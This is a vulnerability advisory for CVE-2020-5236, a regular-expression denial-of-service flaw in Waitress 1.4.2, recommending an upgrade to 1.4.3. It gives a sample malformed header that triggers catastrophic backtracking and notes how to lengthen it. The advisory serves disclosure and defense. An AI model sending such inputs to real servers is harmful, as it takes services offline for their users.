CVE-2020-5236

Name of the Vulnerable Software and Affected Versions Waitress version 1.4.2

Description The issue allows an attacker to send a single request with an invalid header and take the service offline. When Waitress receives a header that contains invalid characters, it will cause the regular expression engine to catastrophically backtrack, causing the process to use 100% CPU time and blocking any other interactions. An example of an invalid header is "Bad-header: xxxxxxxxxxxxxxxx10". Increasing the number of 'x' characters in the header will increase the amount of time Waitress spends in the regular expression engine. This issue was introduced in version 1.4.2 when the regular expression was updated to attempt to match the behavior required by errata associated with RFC7230.

Recommendations For Waitress version 1.4.2, it is recommended to upgrade to version 1.4.3 as soon as possible, as the regular expression used to validate incoming headers has been updated in this version. If you have deployed a reverse proxy in front of Waitress, it may already be rejecting requests that include invalid headers.